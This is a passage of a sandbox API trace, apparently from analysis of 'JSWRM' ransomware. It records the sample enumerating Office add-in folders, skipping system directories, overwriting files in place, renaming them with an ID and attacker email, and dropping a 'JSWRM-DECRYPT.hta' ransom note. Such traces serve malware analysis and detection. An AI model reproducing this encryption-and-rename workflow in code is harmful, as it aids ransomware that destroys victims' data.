lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0125.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.vi.xap", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.vi.xap", lpUsedDefaultChar=0x0) returned 19 [0125.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.vi.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0125.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.vi.xap", cchWideChar=19, lpMultiByteStr=0x240f20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.vi.xap", lpUsedDefaultChar=0x0) returned 19 [0125.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0125.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\PowerViewRes.vi.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\powerviewres.vi.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.677] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=325617) returned 1 [0125.677] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.678] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.692] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.692] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.693] CloseHandle (hObject=0x338) returned 1 [0125.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0125.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0125.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0125.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0125.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.693] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\PowerViewRes.vi.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\powerviewres.vi.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\PowerViewRes.vi.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\powerviewres.vi.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0125.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0125.694] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x161d962a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f7f1, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.vi.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.694] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0125.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.695] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2=".") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="..") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="...") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="windows") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="recovery") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="perflogs") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="documents and settings") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="$RECYCLE.BIN") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="system volume information") returned 1 [0125.695] lstrcmpiW (lpString1="zh-CHS", lpString2="msocache") returned 1 [0125.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0125.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0125.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0125.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0125.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0125.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\jswrm-decrypt.hta")) returned 0xffffffff [0125.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0125.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0125.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0125.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0125.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.702] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.703] CloseHandle (hObject=0x314) returned 1 [0125.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0125.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0125.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0125.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0125.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0125.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\jswrm-decrypt.hta")) returned 0x20 [0125.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0125.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0125.705] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4196f468, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0125.705] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.705] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4196f468, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.705] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.705] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.705] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4c15e5f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc0ab8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.705] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.706] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247e68 [0125.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0125.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.706] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4196f468, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4196f468, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4196f468, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.706] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.707] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a0a7fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a0a7fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a0a7fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.707] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0125.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0125.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0125.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 